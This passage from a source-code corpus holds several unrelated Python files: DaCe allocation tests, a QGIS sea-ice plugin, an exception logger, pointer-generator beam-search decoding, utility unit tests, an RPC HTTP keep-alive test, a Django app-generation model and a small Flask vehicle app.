assert _check_alloc(1, 'tmp', codegen, scopes[-2])
assert _check_alloc(1, 'tmp2', codegen, scopes[-2])
def test_determine_alloc_sdfg():
sdfg, scopes = _test_determine_alloc(dace.AllocationLifetime.SDFG)
codegen = framecode.DaCeCodeGenerator()
codegen.determine_allocation_lifetime(sdfg)
assert _check_alloc(1, 'tmp', codegen, scopes[-3])
assert _check_alloc(1, 'tmp2', codegen, scopes[-3])
def test_determine_alloc_global():
sdfg, scopes = _test_determine_alloc(dace.AllocationLifetime.Global)
codegen = framecode.DaCeCodeGenerator()
codegen.determine_allocation_lifetime(sdfg)
assert any('__1_tmp' in field for field in codegen.statestruct)
assert any('__1_tmp2' in field for field in codegen.statestruct)
assert _check_alloc(1, 'tmp', codegen, sdfg)
assert _check_alloc(1, 'tmp2', codegen, sdfg)
@pytest.mark.gpu
def test_persistent_gpu_copy_regression():
sdfg = dace.SDFG('copynd')
state = sdfg.add_state()
nsdfg = dace.SDFG('copynd_nsdfg')
nstate = nsdfg.add_state()
sdfg.add_array("input", [2, 2], dace.float64)
sdfg.add_array("input_gpu", [2, 2],
dace.float64,
transient=True,
storage=dace.StorageType.GPU_Global,
lifetime=dace.AllocationLifetime.Persistent)
sdfg.add_array("__return", [2, 2], dace.float64)
nsdfg.add_array("ninput", [2, 2],
dace.float64,
storage=dace.StorageType.GPU_Global,
lifetime=dace.AllocationLifetime.Persistent)
nsdfg.add_array("transient_heap", [2, 2],
dace.float64,
transient=True,
storage=dace.StorageType.CPU_Heap,
lifetime=dace.AllocationLifetime.Persistent)
nsdfg.add_array("noutput", [2, 2],
dace.float64,
storage=dace.dtypes.StorageType.CPU_Heap,
lifetime=dace.AllocationLifetime.Persistent)
a_trans = nstate.add_access("transient_heap")
nstate.add_edge(nstate.add_read("ninput"), None, a_trans, None, nsdfg.make_array_memlet("transient_heap"))
nstate.add_edge(a_trans, None, nstate.add_write("noutput"), None, nsdfg.make_array_memlet("transient_heap"))
a_gpu = state.add_read("input_gpu")
nsdfg_node = state.add_nested_sdfg(nsdfg, None, {"ninput"}, {"noutput"})
wR = state.add_write("__return")
state.add_edge(state.add_read("input"), None, a_gpu, None, sdfg.make_array_memlet("input"))
state.add_edge(a_gpu, None, nsdfg_node, "ninput", sdfg.make_array_memlet("input_gpu"))
state.add_edge(nsdfg_node, "noutput", wR, None, sdfg.make_array_memlet("__return"))
result = sdfg(input=np.ones((2, 2), dtype=np.float64))
assert np.all(result == np.ones((2, 2)))
@pytest.mark.gpu
def test_persistent_gpu_transpose_regression():
@dace.program
def test_persistent_transpose(A: dace.float64[5, 3]):
return np.transpose(A)
sdfg = test_persistent_transpose.to_sdfg()
sdfg.expand_library_nodes()
sdfg.simplify()
sdfg.apply_gpu_transformations()
for _, _, arr in sdfg.arrays_recursive():
if arr.transient and arr.storage == dace.StorageType.GPU_Global:
arr.lifetime = dace.AllocationLifetime.Persistent
A = np.random.rand(5, 3)
result = sdfg(A=A)
assert np.allclose(np.transpose(A), result)
def test_alloc_persistent_register():
""" Tries to allocate persistent register array. Should fail. """
@dace.program
def lifetimetest(input: dace.float64[N]):
tmp = dace.ndarray([1], input.dtype)
return tmp + 1
sdfg: dace.SDFG = lifetimetest.to_sdfg()
sdfg.arrays['tmp'].storage = dace.StorageType.Register
sdfg.arrays['tmp'].lifetime = dace.AllocationLifetime.Persistent
try:
sdfg.validate()
raise AssertionError('SDFG should not be valid')
except dace.sdfg.InvalidSDFGError:
print('Exception caught, test passed')
def test_alloc_persistent():
@dace.program
def persistentmem(output: dace.int32[1]):
tmp = dace.ndarray([1], output.dtype, lifetime=dace.AllocationLifetime.Persistent)
if output[0] == 1.0:
tmp[0] = 0
else:
tmp[0] += 3
output[0] = tmp[0]
# Repeatedly invoke program. Since memory is persistent, output is expected
# to increase with each call
csdfg = persistentmem.compile()
value = np.ones([1], dtype=np.int32)
csdfg(output=value)
assert value[0] == 1
value[0] = 2
csdfg(output=value)
assert value[0] == 3
csdfg(output=value)
assert value[0] == 6
del csdfg
def test_alloc_persistent_threadlocal():
@dace.program
def persistentmem(output: dace.int32[2]):
tmp = dace.ndarray([2],
output.dtype,
storage=dace.StorageType.CPU_ThreadLocal,
lifetime=dace.AllocationLifetime.Persistent)
if output[0] == 1.0:
for i in dace.map[0:2]:
tmp[i] = i
else:
for i in dace.map[0:2]:
tmp[i] += 3
output[i] = tmp[i]
# Repeatedly invoke program. Since memory is persistent, output is expected
# to increase with each call
csdfg = persistentmem.compile()
value = np.ones([2], dtype=np.int32)
csdfg(output=value)
assert value[0] == 1
assert value[1] == 1
value[0] = 4
value[1] = 2
csdfg(output=value)
assert value[0] == 3
assert value[1] == 4
csdfg(output=value)
assert value[0] == 6
assert value[1] == 7
del csdfg
def test_alloc_multistate():
i = dace.symbol('i')
sdfg = dace.SDFG('multistate')
sdfg.add_array('A', [20], dace.float64)
sdfg.add_array('B', [20], dace.float64)
sdfg.add_transient('tmp', [i + 1], dace.float64)
init = sdfg.add_state()
end = sdfg.add_state()
s2 = sdfg.add_state()
sdfg.add_loop(init, s2, end, 'i', '0', 'i < 5', 'i + 1')
s1 = sdfg.add_state_before(s2)
ar = s1.add_read('A')
tw = s1.add_write('tmp')
s1.add_nedge(ar, tw, dace.Memlet('A[0:i+1]'))
tr = s2.add_read('tmp')
bw = s2.add_write('B')
s2.add_nedge(tr, bw, dace.Memlet('tmp'))
A = np.random.rand(20)
B = np.random.rand(20)
sdfg(A=A, B=B)
assert np.allclose(A[:5], B[:5])
def test_nested_view_samename():
@dace.program
def incall(a, b):
tmp = a.reshape([10, 2])
tmp[:] += 1
return tmp
@dace.program
def top(a: dace.float64[20]):
tmp = dace.ndarray([20], dace.float64, lifetime=dace.AllocationLifetime.Persistent)
return incall(a, tmp)
sdfg = top.to_sdfg(simplify=False)
a = np.random.rand(20)
ref = a.copy()
b = sdfg(a)
assert np.allclose(b, ref.reshape(10, 2) + 1)
def test_nested_persistent():
@dace.program
def nestpers(a):
tmp = np.ndarray([20], np.float64)
tmp[:] = a + 1
return tmp
@dace.program
def toppers(a: dace.float64[20]):
return nestpers(a)
sdfg = toppers.to_sdfg(simplify=False)
for _, _, arr in sdfg.arrays_recursive():
if arr.transient:
arr.lifetime = dace.AllocationLifetime.Persistent
a = np.random.rand(20)
b = sdfg(a)
assert np.allclose(b, a + 1)
def test_persistent_scalar():
@dace.program
def perscal(a: dace.float64[20]):
tmp = dace.define_local_scalar(dace.float64, lifetime=dace.AllocationLifetime.Persistent)
tmp[:] = a[1] + 1
return tmp
a = np.random.rand(20)
b = perscal(a)
assert np.allclose(b, a[1] + 1)
if __name__ == '__main__':
test_determine_alloc_scope()
test_determine_alloc_state()
test_determine_alloc_sdfg()
test_determine_alloc_global()
test_persistent_gpu_copy_regression()
test_persistent_gpu_transpose_regression()
test_alloc_persistent_register()
test_alloc_persistent()
test_alloc_persistent_threadlocal()
test_alloc_multistate()
test_nested_view_samename()
test_nested_persistent()
test_persistent_scalar()
|
py | 1a3898af9312d2016a1e8aba2d9c51379400ca12 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
SeaIceData
A QGIS plugin
Downloads sea ice concentration data from NSIDC
-------------------
begin : 2014-10-02
copyright : (C) 2014 by Louise Ireland
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
# Import the PyQt and QGIS libraries
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qgis.core import *
# Initialize Qt resources from file resources.py
import resources
# Import the code for the dialog
from seaicedatadialog import SeaIceDataDialog
import os.path
class SeaIceData:
def __init__(self, iface):
# Save reference to the QGIS interface
self.iface = iface
# initialize plugin directory
self.plugin_dir = os.path.dirname(__file__)
# initialize locale
locale = QSettings().value("locale/userLocale")[0:2]
localePath = os.path.join(self.plugin_dir, 'i18n', 'seaicedata_{}.qm'.format(locale))
if os.path.exists(localePath):
self.translator = QTranslator()
self.translator.load(localePath)
if qVersion() > '4.3.3':
QCoreApplication.installTranslator(self.translator)
# Create the dialog (after translation) and keep reference
self.dlg = SeaIceDataDialog()
def initGui(self):
# Create action that will start plugin configuration
self.action = QAction(
QIcon(":/plugins/seaicedata/icon.png"),
u"Sea Ice Data Downloader", self.iface.mainWindow())
# connect the action to the run method
self.action.triggered.connect(self.run)
# Add toolbar button and menu item
self.iface.addToolBarIcon(self.action)
self.iface.addPluginToMenu(u"&Sea Ice Data Downloader", self.action)
def unload(self):
# Remove the plugin menu item and icon
self.iface.removePluginMenu(u"&Sea Ice Data Downloader", self.action)
self.iface.removeToolBarIcon(self.action)
# run method that performs all the real work
def run(self):
# show the dialog
self.dlg.show()
|
py | 1a3898d098108abc211b8aed93df53f699218c12 | import inspect
import logging
from typing import Any, Dict, Optional
from panoramic.cli.husky.common.exception_enums import (
ComponentType,
ExceptionGroup,
ExceptionSeverity,
)
from panoramic.cli.husky.common.util import exception_to_string_with_traceback
logger = logging.getLogger(__name__)
class ExceptionTags:
REQUEST_DATA = '_request_data'
class ExceptionHandler:
@classmethod
def track_exception(
cls,
exc: Exception,
exc_group: ExceptionGroup = ExceptionGroup.COMMON,
message: Optional[str] = None,
ddog_tags: Optional[Dict[str, Any]] = None,
severity: ExceptionSeverity = ExceptionSeverity.error,
component: ComponentType = ComponentType.UNKNOWN,
):
"""
        Single entry point for logging an exception to stderr and Datadog.
        Provisional: we can change this later or move it into the shared Python lib.
"""
caller_frame = inspect.stack()[1]
called_by = f'File {caller_frame.filename}, line {caller_frame.lineno}, in {caller_frame.function}'
ddog_tags = ddog_tags or dict()
ddog_tags['exception_type'] = type(exc).__name__
ddog_tags['exception_group'] = exc_group.value
ddog_tags['component'] = component.value
ddog_tags['severity'] = severity.value
all_tags = dict()
all_tags.update(ddog_tags)
request_data_str = '<not-set>'
if ExceptionTags.REQUEST_DATA in all_tags:
# Log request data separately, not inside tags, coz it adds one more level of json escaping and is even
# crazier to read
request_data_str = str(all_tags[ExceptionTags.REQUEST_DATA])
del all_tags[ExceptionTags.REQUEST_DATA]
logger.error(
f'Message: {message} Called by: {called_by}. '
f'Exception: {exception_to_string_with_traceback(exc)} Tags: {all_tags} '
f'{request_data_str}'
)
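# Illustrative call site (hypothetical names, shown only to demonstrate the tagging flow):
#
#     try:
#         handle_request(request)
#     except Exception as exc:
#         ExceptionHandler.track_exception(
#             exc,
#             message='request handling failed',
#             ddog_tags={ExceptionTags.REQUEST_DATA: str(request)},
#         )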
|
py | 1a389bc6f3123960a7671695851354197e9a29ca | #Except for the pytorch part content of this file is copied from https://github.com/abisee/pointer-generator/blob/master/
from __future__ import unicode_literals, print_function, division
import sys
import os
import time
import torch
from torch.autograd import Variable
sys.path.append('/home/kxiao/pointer_generator_pytorch/')
from data_util.batcher import Batcher
from data_util.data import Vocab
from data_util import data, config
from model import Model
from data_util.utils import write_for_rouge, rouge_eval, rouge_log
from train_util import get_input_from_batch
use_cuda = config.use_gpu and torch.cuda.is_available()
class Beam(object):
def __init__(self, tokens, log_probs, state, context, coverage):
self.tokens = tokens
self.log_probs = log_probs
self.state = state
self.context = context
self.coverage = coverage
def extend(self, token, log_prob, state, context, coverage):
return Beam(tokens = self.tokens + [token],
log_probs = self.log_probs + [log_prob],
state = state,
context = context,
coverage = coverage)
@property
def latest_token(self):
return self.tokens[-1]
@property
def avg_log_prob(self):
return sum(self.log_probs) / len(self.tokens)
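# Note: avg_log_prob length-normalizes the beam score (sum of token log-probs
# divided by hypothesis length), e.g. log_probs [0.0, -0.2, -0.4] over 3 tokens
# scores -0.2, so longer hypotheses are not penalized just for emitting more tokens.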
class BeamSearch(object):
def __init__(self, model_file_path):
model_name = os.path.basename(model_file_path)
self._decode_dir = os.path.join(config.log_root, 'decode_%s' % (model_name))
self._rouge_ref_dir = os.path.join(self._decode_dir, 'rouge_ref')
self._rouge_dec_dir = os.path.join(self._decode_dir, 'rouge_dec_dir')
for p in [self._decode_dir, self._rouge_ref_dir, self._rouge_dec_dir]:
if not os.path.exists(p):
os.mkdir(p)
self.vocab = Vocab(config.vocab_path, config.vocab_size)
self.batcher = Batcher(config.decode_data_path, self.vocab, mode='decode',
batch_size=config.beam_size, single_pass=True)
time.sleep(15)
self.model = Model(model_file_path, is_eval=True)
def sort_beams(self, beams):
return sorted(beams, key=lambda h: h.avg_log_prob, reverse=True)
def decode(self):
start = time.time()
counter = 0
batch = self.batcher.next_batch()
        # in the new architecture this loop lives in the decode part of the training code
while batch is not None:
# Run beam search to get best Hypothesis
best_summary = self.beam_search(batch)
# Extract the output ids from the hypothesis and convert back to words
output_ids = [int(t) for t in best_summary.tokens[1:]]
decoded_words = data.outputids2words(output_ids, self.vocab,
(batch.art_oovs[0] if config.pointer_gen else None))
# Remove the [STOP] token from decoded_words, if necessary
try:
fst_stop_idx = decoded_words.index(data.MARK_EOS)
decoded_words = decoded_words[:fst_stop_idx]
except ValueError:
decoded_words = decoded_words
original_abstract_sents = batch.original_abstracts_sents[0]
original_article = batch.original_articles[0]
            # English output path
# write_for_rouge(original_abstract_sents, decoded_words, counter,
# self._rouge_ref_dir, self._rouge_dec_dir)
            # Chinese output path
self.write_result(original_article, original_abstract_sents,
decoded_words, counter)
counter += 1
# if counter % 1000 == 0:
# print('%d example in %d sec'%(counter, time.time() - start))
# start = time.time()
batch = self.batcher.next_batch()
# print("Decoder has finished reading dataset for single_pass.")
# print("Now starting ROUGE eval...")
# results_dict = rouge_eval(self._rouge_ref_dir, self._rouge_dec_dir)
# rouge_log(results_dict, self._decode_dir)
def write_result(self, original_title, reference_summarization,
decoded_words, ex_index):
"""
        Write one decoded example to the result file.
        Args:
            original_title: string, the original article text
            reference_summarization: string, the reference summary
            decoded_words: list of strings, the decoded summary tokens
            ex_index: int, the index with which to label the example
"""
summarization = ''.join(decoded_words)
# Write to file
result_file = os.path.join(self._decode_dir, "result.txt")
        with open(result_file, 'a') as f:  # append so earlier examples are not overwritten
f.write(
original_title + '\t\t' +
reference_summarization + '\t\t' +
summarization + "\n")
print("Wrote example %i to file" % ex_index)
def beam_search(self, batch):
#batch should have only one example
enc_batch, enc_padding_mask, enc_lens, enc_batch_extend_vocab, extra_zeros, c_t_0, coverage_t_0 = \
get_input_from_batch(batch, use_cuda)
encoder_outputs, encoder_feature, encoder_hidden = self.model.encoder(enc_batch, enc_lens)
s_t_0 = self.model.reduce_state(encoder_hidden)
dec_h, dec_c = s_t_0 # 1 x 2*hidden_size
dec_h = dec_h.squeeze()
dec_c = dec_c.squeeze()
#decoder batch preparation, it has beam_size example initially everything is repeated
beams = [Beam(tokens=[self.vocab.word2id(data.MARK_GO)],
log_probs=[0.0],
state=(dec_h[0], dec_c[0]),
context = c_t_0[0],
coverage=(coverage_t_0[0] if config.is_coverage else None))
for _ in range(config.beam_size)]
results = []
steps = 0
while steps < config.max_dec_steps and len(results) < config.beam_size:
latest_tokens = [h.latest_token for h in beams]
latest_tokens = [t if t < self.vocab.size() else self.vocab.word2id(data.MARK_UNK) \
for t in latest_tokens]
            y_t_1 = Variable(torch.LongTensor(latest_tokens))  # vector of the latest tokens
if use_cuda:
y_t_1 = y_t_1.cuda()
all_state_h =[]
all_state_c = []
all_context = []
for h in beams:
state_h, state_c = h.state
all_state_h.append(state_h)
all_state_c.append(state_c)
all_context.append(h.context)
s_t_1 = (torch.stack(all_state_h, 0).unsqueeze(0), torch.stack(all_state_c, 0).unsqueeze(0))
c_t_1 = torch.stack(all_context, 0)
coverage_t_1 = None
if config.is_coverage:
all_coverage = []
for h in beams:
all_coverage.append(h.coverage)
coverage_t_1 = torch.stack(all_coverage, 0)
final_dist, s_t, c_t, attn_dist, p_gen, coverage_t = self.model.decoder(y_t_1, s_t_1,
encoder_outputs, encoder_feature, enc_padding_mask, c_t_1,
extra_zeros, enc_batch_extend_vocab, coverage_t_1, steps)
log_probs = torch.log(final_dist)
topk_log_probs, topk_ids = torch.topk(log_probs, config.beam_size * 2)
dec_h, dec_c = s_t
dec_h = dec_h.squeeze()
dec_c = dec_c.squeeze()
all_beams = []
num_orig_beams = 1 if steps == 0 else len(beams)
            for i in range(num_orig_beams):  # for each of the different hypotheses
h = beams[i]
state_i = (dec_h[i], dec_c[i])
context_i = c_t[i]
coverage_i = (coverage_t[i] if config.is_coverage else None)
for j in range(config.beam_size * 2): # for each of the top 2*beam_size hyps:
new_beam = h.extend(token=topk_ids[i, j].item(),
log_prob=topk_log_probs[i, j].item(),
state=state_i,
context=context_i,
coverage=coverage_i)
all_beams.append(new_beam)
beams = []
for h in self.sort_beams(all_beams):
if h.latest_token == self.vocab.word2id(data.MARK_EOS):
if steps >= config.min_dec_steps:
results.append(h)
else:
beams.append(h)
if len(beams) == config.beam_size or len(results) == config.beam_size:
break
steps += 1
if len(results) == 0:
results = beams
beams_sorted = self.sort_beams(results)
return beams_sorted[0]
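# CLI usage (script name assumed): python decode.py <path_to_model_checkpoint>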
if __name__ == '__main__':
model_filename = sys.argv[1]
beam_Search_processor = BeamSearch(model_filename)
beam_Search_processor.decode()
|
py | 1a389c95837ece8fc1331f7409f66ac81065d496 | import math
import unittest
from datetime import datetime, timedelta
from decimal import Decimal
from unittest.mock import patch
import pandas as pd
import pytz
from src.constants import ZERO
from src.dto.attempt_dto import AttemptDTO
from src.utils.utils import Utils as Utilities
from tests.utils.utils import Utils
class UtilsTestCase(unittest.TestCase):
def test_valid(self):
valid = Utilities.valid(Decimal('1'), Decimal('2'), Decimal('3'))
self.assertEqual(valid, True)
valid = Utilities.valid(Decimal('3'), Decimal('2'), Decimal('3'))
self.assertEqual(valid, False)
valid = Utilities.valid(Decimal('1'), Decimal('2'), Decimal('1'))
self.assertEqual(valid, False)
def test_negation(self):
negation = Utilities.negation()
self.assertIsInstance(negation, Decimal)
self.assertGreaterEqual(negation, Decimal('-1'))
self.assertLessEqual(negation, Decimal('1'))
def test_inverse(self):
inverse = Utilities.inverse()
self.assertIsInstance(inverse, Decimal)
self.assertGreaterEqual(inverse, ZERO)
self.assertLessEqual(inverse, math.inf)
def test_group(self):
iterable = [1, 2, 3, 4, 5, 6, 7, 8, 9]
group = Utilities.group(3, iterable)
self.assertTupleEqual(group, ((1, 2, 3), (4, 5, 6), (7, 8, 9)))
group = Utilities.group(2, iterable)
self.assertTupleEqual(group, ((1, 2), (3, 4), (5, 6), (7, 8)))
def test_number(self):
number = Utilities.number(Decimal('6.3'), Decimal('2.4'))
self.assertEqual(number, Decimal('2'))
number = Utilities.number(Decimal('9.2'), Decimal('2.9'))
self.assertEqual(number, Decimal('3'))
number = Utilities.number(ZERO, ZERO)
self.assertEqual(number, ZERO)
def test_day_delta_value(self):
dates = pd.date_range('1/1/2000', periods=15, freq='8h')
tickers = ['AAA', 'BBB']
frame = pd.DataFrame(index=dates, columns=tickers)
for i in range(frame.shape[0]):
for j in range(frame.shape[1]):
frame.iloc[i][j] = i + j
frame.sort_index(inplace=True, ascending=True)
date = frame.index.max()
value_aaa = Utilities.day_delta_value(frame, 'AAA', date, Decimal('1'))
value_bbb = Utilities.day_delta_value(frame, 'BBB', date, Decimal('1'))
self.assertEqual(value_aaa, Decimal('11'))
self.assertEqual(value_bbb, Decimal('12'))
value_aaa = Utilities.day_delta_value(frame, 'AAA', date, Decimal('2'))
value_bbb = Utilities.day_delta_value(frame, 'BBB', date, Decimal('2'))
self.assertEqual(value_aaa, Decimal('8'))
self.assertEqual(value_bbb, Decimal('9'))
value_aaa = Utilities.day_delta_value(frame, 'AAA', date, Decimal('3'))
value_bbb = Utilities.day_delta_value(frame, 'BBB', date, Decimal('3'))
self.assertEqual(value_aaa, Decimal('5'))
self.assertEqual(value_bbb, Decimal('6'))
value_aaa = Utilities.day_delta_value(frame, 'AAA', date, Decimal('10'))
value_bbb = Utilities.day_delta_value(frame, 'BBB', date, Decimal('10'))
self.assertTrue(math.isnan(value_aaa))
self.assertTrue(math.isnan(value_bbb))
@patch('src.utils.utils.Utils.now')
def test_is_today(self, now):
today = pytz.utc.localize(datetime.fromisoformat('2011-11-04T00:00:00'))
now.return_value = today
self.assertTrue(Utilities.is_today(today))
self.assertTrue(Utilities.is_today(today + timedelta(microseconds=23)))
self.assertTrue(Utilities.is_today(today + timedelta(milliseconds=23)))
self.assertTrue(Utilities.is_today(today + timedelta(seconds=23)))
self.assertTrue(Utilities.is_today(today + timedelta(minutes=23)))
self.assertTrue(Utilities.is_today(today + timedelta(hours=23)))
self.assertFalse(Utilities.is_today(today + timedelta(hours=24)))
self.assertFalse(Utilities.is_today(today + timedelta(days=1)))
self.assertFalse(Utilities.is_today(today + timedelta(weeks=52)))
self.assertFalse(Utilities.is_today(None))
@patch('src.utils.utils.Utils.now')
def test_is_working_day_ny(self, now):
now.return_value = pytz.utc.localize(datetime.fromisoformat('2019-07-05T12:00:00'))
self.assertTrue(Utilities.is_working_day_ny())
now.return_value = pytz.utc.localize(datetime.fromisoformat('2019-07-06T12:00:00'))
self.assertFalse(Utilities.is_working_day_ny())
now.return_value = pytz.utc.localize(datetime.fromisoformat('2019-07-04T12:00:00'))
self.assertFalse(Utilities.is_working_day_ny())
def test_first(self):
self.assertIsNone(Utilities.first([]))
self.assertEqual(Utilities.first([1]), 1)
self.assertEqual(Utilities.first([1, 2]), 1)
def test_assert_attributes(self):
attempt = AttemptDTO()
Utilities.set_attributes(attempt, amount_buy=Decimal('1'), distance_buy=Decimal('2'), delta_buy=Decimal('3'),
amount_sell=Decimal('4'), distance_sell=Decimal('5'), delta_sell=Decimal('6'))
self.assertIsInstance(attempt, AttemptDTO)
Utils.assert_attributes(attempt, amount_buy=Decimal('1'), distance_buy=Decimal('2'), delta_buy=Decimal('3'),
amount_sell=Decimal('4'), distance_sell=Decimal('5'), delta_sell=Decimal('6'))
def test_truncate(self):
self.assertEqual(Utilities.truncate(Decimal('0.5')), ZERO)
self.assertEqual(Utilities.truncate(Decimal('-0.5')), ZERO)
self.assertEqual(Utilities.truncate(Decimal('1.2')), Decimal('1'))
self.assertEqual(Utilities.truncate(Decimal('-1.2')), Decimal('-1'))
self.assertEqual(Utilities.truncate(Decimal('1.9')), Decimal('1'))
self.assertEqual(Utilities.truncate(Decimal('-1.9')), Decimal('-1'))
self.assertEqual(Utilities.truncate(Decimal('10')), Decimal('10'))
self.assertEqual(Utilities.truncate(Decimal('-10')), Decimal('-10'))
if __name__ == '__main__':
unittest.main()
|
py | 1a389ce37247ccc55625cd5b6811a03f3769fc41 | #!/usr/bin/env python3
# Copyright (c) 2014-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the RPC HTTP basics."""
from test_framework.test_framework import KabberryTestFramework
from test_framework.util import *
import http.client
import urllib.parse
class HTTPBasicsTest (KabberryTestFramework):
def set_test_params(self):
self.num_nodes = 3
def setup_network(self):
self.setup_nodes()
def run_test(self):
#################################################
# lowlevel check for http persistent connection #
#################################################
url = urllib.parse.urlparse(self.nodes[0].url)
authpair = url.username + ':' + url.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#same should be if we add keep-alive because this should be the std. behaviour
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection": "keep-alive"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#now do the same with "Connection: close"
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection":"close"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock==None) #now the connection must be closed after the response
#node1 (2nd node) is running with disabled keep-alive option
urlNode1 = urllib.parse.urlparse(self.nodes[1].url)
authpair = urlNode1.username + ':' + urlNode1.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
#node2 (third node) is running with standard keep-alive parameters which means keep-alive is on
urlNode2 = urllib.parse.urlparse(self.nodes[2].url)
authpair = urlNode2.username + ':' + urlNode2.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
        assert(conn.sock!=None) #connection must still be open because kabberryd uses keep-alive by default
# Check excessive request size
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*1000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.NOT_FOUND)
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*10000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.BAD_REQUEST)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
|
py | 1a389e8e762cb33845958ad51bdaa1831a8ae682 | from __future__ import unicode_literals
import os
from django.db import models
from django.template.loader import get_template
from django.dispatch import receiver
from base.models import TimeStamp
from modeller.models import ModelObject
from endpoint.models import EndPoint
from .utils import startapp_v2, app_management_command
from .signals import models_ready
import logging
logger = logging.getLogger(__name__)
class App(TimeStamp):
project = models.ForeignKey('project.Project')
name = models.SlugField(max_length=50, unique=True)
need_migration = models.BooleanField(default=True)
created_by = models.ForeignKey('auth.User', null=True, blank=True)
class Meta:
unique_together = ("name", "project")
def __unicode__(self):
return "{0}-{1}".format(self.project, self.name)
def total_models(self):
return self.modelobject_set.count()
@property
def name_lower(self):
"""
"""
return self.name.lower()
@property
def app_code_name(self):
"""
        Return the app name joined with the project UUID hex,
        which is used as the app folder name."""
return "_{1}_{0}".format(self.name, self.project_id.hex)
def source_code_available(self):
"""
"""
return os.path.isdir(
"{0}/apps/{1}/".format(
self.project.project_dir(), self.name_lower))
def generate_codes(self):
"""
Generates source codes, this method is
equivalent to django startapp command.
"""
if not self.source_code_available():
startapp_v2(
self.name_lower,
project_dir=self.project.project_dir())
return True
else:
return False
def write_models(self):
# Need to Depricate below codes
self.need_migration = True
self.save()
####
template = get_template('modeller/base_models.py')
context = {
'model_objects': ModelObject.objects.filter(app=self)
}
result = template.render(context)
f = open(
'{1}/apps/{0}/models.py'.format(
self.name_lower,
self.project.project_dir()),
'w')
f.write(result)
f.close()
# Writes an empty file in methods folder
model_list = list()
for model in self.modelobject_set.all():
model_list.append(model.name.lower())
model_file = open(
'{1}/apps/{0}/methods/{2}.py'.format(
self.name_lower,
self.project.project_dir(),
model.name.lower()),
'w')
model_file.write('')
model_file.close()
# Writes import in __init__ file of methods folder
init_file = open(
'{1}/apps/{0}/methods/__init__.py'.format(
self.name_lower,
self.project.project_dir()),
'w')
imports = ','.join(model_list)
init_file.write('import {0}'.format(imports))
init_file.close()
models_ready.send(
sender=None, project_name=self.project.clean_project_name)
return True
def makemigrations(self):
# call_command('makemigrations', self.app_code_name, interactive=False)
app_management_command(
self.name_lower,
self.project.project_dir(),
'makemigrations'
)
def migrate(self):
# call_command('migrate', self.app_code_name, interactive=False)
app_management_command(
self.name_lower,
self.project.project_dir(),
'migrate'
)
def get_default_endpoints(self):
endpoints = list()
# endpoints.append(args)
for model in self.modelobject_set.all():
endpoints += model.get_default_endpoints()
return endpoints
def write_views(self):
template = get_template('endpoint/base_views.py')
context = {
'endpoints': EndPoint.objects.filter(app=self)
}
result = template.render(context)
f = open(
'{1}/apps/{0}/autogen_views.py'.format(
self.name_lower,
self.project.project_dir()),
'w')
f.write(result)
f.close()
def prepare_app(self):
print "Writting models"
self.write_models()
print "Running Makemigrations"
self.makemigrations()
def save(self, *args, **kwargs):
if self._state.adding is True:
self.generate_codes()
return super(self.__class__, self).save(*args, **kwargs)
@receiver(models_ready)
def restart_server(project_name, **kwargs):
print "Restarting the server"
print project_name
try:
os.system(
"~/./webapps/{0}/apache2/bin/restart".format(
project_name))
print "Server Restarted.."
except Exception as e:
logger.exception(e)
print "Couldnt not restart the server"
|
py | 1a389f06bfe1ae5d7a830bc6bd2e2d707e91997f | from flask import Flask, render_template
from application.models import Vehicles
from sqlalchemy import desc
from application import app, db
import requests
@app.route('/')
def index():
make = requests.get('http://make_api:5001/get_make')
model = requests.get('http://model_api:5002/get_model')
mot = requests.post('http://mot_api:5003/get_mot', json={'make':make.text, 'model':model.text})
vehicle = Vehicles(make = make.text, model = model.text, mot = mot.text)
db.session.add(vehicle)
db.session.commit()
vehicles = Vehicles.query.order_by(Vehicles.id.desc()).limit(5)
return render_template ('index.html', make=make.text, model=model.text, vehicles=vehicles, mot=mot.text)
|
